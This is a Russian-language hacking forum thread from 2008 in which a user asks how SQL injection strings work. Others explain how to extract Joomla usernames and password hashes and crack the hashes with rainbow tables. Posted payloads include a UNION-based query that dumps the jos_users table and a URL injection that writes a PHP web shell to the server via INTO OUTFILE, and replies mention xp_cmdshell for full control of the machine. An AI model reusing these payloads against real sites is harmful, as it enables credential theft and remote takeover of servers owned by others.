day & night

SQL Injection, помогите разобраться
Дата обновления: , перейти к новому сообщению
icon13
#1
Ra1N



Специалист
****

Группа: Пользователи
Сообщений: 455
Регистрация: 13.07.2005
Пользователь №: 28.722


Респектов: 8
-----X----


Предупреждений: 2


Приветствую!

У меня проблема следующего плана, есть сформированый до меня sql запрос: /**/union/* */select/**/0x3a,username,0x3a,password,0x3a,0x3a/* */from/**/jos_users/*

Очень хотелось бы составить свой, но меня пугают символы:
/**/union/* */select/**/0x3a,username,0x3a,password,0x3a,0x3a/* */from/**/jos_users/*
что они означают, и как с ними разобраться, не могли бы вы помочь, или хотя бы кинуть ссылку а толковый мануал?!
User is offline
Go topGo end

Ответов(10 - 15)
13.03.2008 - 17:32
#11
de1ay



профи!
[SoftoRooMTeaM] Group Icon

Группа: Наши Люди
Сообщений: 4.437
Регистрация: 14.10.2005
Из: EU
Пользователь №: 1.010


Респектов: 613
-----XXXX-




Цитата | Quote(Rain of Dark @ 13.03.2008 - 13:17)
экранироваться = фильтроваться? Оо
*
Именно.
И все же, не прав я был по поводу insert`a, после union только селект использовать можно.
User is offline
Go topGo end
14.03.2008 - 5:05
#12
Ra1N



Специалист
****

Группа: Пользователи
Сообщений: 455
Регистрация: 13.07.2005
Пользователь №: 28.722


Респектов: 8
-----X----


Предупреждений: 2


а тогда каков смысл таких атак?
Расшифровать хэш врядли получится, подделать кукисы в cms типа jooml'ы тоже не удается, тогда все эти инъекции бесполезны?
User is offline
Go topGo end
14.03.2008 - 8:20
#13
de1ay



профи!
[SoftoRooMTeaM] Group Icon

Группа: Наши Люди
Сообщений: 4.437
Регистрация: 14.10.2005
Из: EU
Пользователь №: 1.010


Респектов: 613
-----XXXX-




Цитата | Quote(Rain of Dark @ 14.03.2008 - 5:08)
Расшифровать хэш врядли получится, подделать кукисы в cms типа jooml'ы тоже не удается, тогда все эти инъекции бесполезны?
*

А почему так категорично на счет хэша? Вполне реально его сбрутить, если присутствует желание. Можно читать файлы, можно шелл залить...
В MSSQL, если крутитится она от пользователя sa, можно использовать xp_cmdshell, что может привести к полному контролю над машиной.
User is offline
Go topGo end
14.03.2008 - 12:03
#14
Ra1N



Специалист
****

Группа: Пользователи
Сообщений: 455
Регистрация: 13.07.2005
Пользователь №: 28.722


Респектов: 8
-----X----


Предупреждений: 2


а шелл то как можно залить если только читать файлы можно и select использовать?! О.о

А на счет хэша, ну если допустим даже пароль из восьми символов, да еще и с использованием хотябы одного спецсимвола, то это ж на стену полезишь, пока его сбрутишь!
Цитата | Quote
В MSSQL, если крутитится она от пользователя sa, можно использовать xp_cmdshell

это еще что за пользователь такой?
User is offline
Go topGo end
16.03.2008 - 10:41
#15
de1ay



профи!
[SoftoRooMTeaM] Group Icon

Группа: Наши Люди
Сообщений: 4.437
Регистрация: 14.10.2005
Из: EU
Пользователь №: 1.010


Респектов: 613
-----XXXX-




Цитата | Quote(Rain of Dark @ 14.03.2008 - 12:06)
а шелл то как можно залить если только читать файлы можно и select использовать?! О.о
*

Не игнорь мои советы прочитать статью. smile.gif

Code
http://www.site.ru/index.php?page=-1+union+select+1,2,,'<?php system($_GET[cmd]); ?>',4,5+from+user+into+outfile+'/home/site/html/shell.php'/*


Цитата | Quote(Rain of Dark @ 14.03.2008 - 12:06)
А на счет хэша, ну если допустим даже пароль из восьми символов, да еще и с использованием хотябы одного спецсимвола, то это ж на стену полезишь, пока его сбрутишь!
*
Есть такие замечательные таблицы - Rainbow tables. Сильно сокращают время подбора хэша.

Цитата | Quote(Rain of Dark @ 14.03.2008 - 12:06)
это еще что за пользователь такой?
*
root в mysql.
User is offline
Go topGo end
16.03.2008 - 13:41
#16
Ra1N



Специалист
****

Группа: Пользователи
Сообщений: 455
Регистрация: 13.07.2005
Пользователь №: 28.722


Респектов: 8
-----X----


Предупреждений: 2


Цитата | Quote(delay(0) @ 16.03.2008 - 18:44)
Есть такие замечательные таблицы - Rainbow tables. Сильно сокращают время подбора хэша.
*


а можно поподробнее об этих самых таблицах, ну или хоть линку дай wink.gif

Добавлено:

а, все не надо, нашел, спасибо за помощь!
Респект! wink.gif
User is offline
Go topGo end

Topic Options
Сейчас: 15.05.2024 - 17:42
Мобильная версия | Lite версия